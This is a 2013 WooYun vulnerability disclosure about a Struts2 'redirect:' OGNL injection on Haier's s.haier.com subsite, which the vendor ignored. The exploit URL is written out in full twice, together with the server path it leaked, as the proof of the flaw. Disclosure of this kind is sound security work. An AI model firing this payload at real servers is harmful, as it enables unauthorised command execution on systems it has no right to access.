海尔一处隐蔽的命令执行 | wooyun-2013-045351

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2013-045351

漏洞标题：

海尔一处隐蔽的命令执行

漏洞详情

披露状态：

2013-12-09：细节已通知厂商并且等待厂商处理中
2013-12-14：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

海尔一处隐蔽的命令执行

详细说明：

问题出现在s.haier.com这个e互动的分站上。本来是想去玩玩上传，注入之类的漏洞，没想到遇到更劲爆的漏洞。是怎么发现的了？本来我是准备用burp suite测试上传注入之类的，可是无意中在他的history里面发现了这个

，看到没？于是检测下，果然存在。

http://s.haier.com//haier/showDemands.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
D:\server\haiertomcatsr\webapps\haier\

这个站里面的数据是和portal系统同步的，危害不小啊，测试了下，貌似做了负载均衡，可是都能执行命令了，那个又能怎么样？

漏洞证明：

http://s.haier.com//haier/showDemands.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
D:\server\haiertomcatsr\webapps\haier\

修复方案：

这不说了吧

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2013-12-14 11:10

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞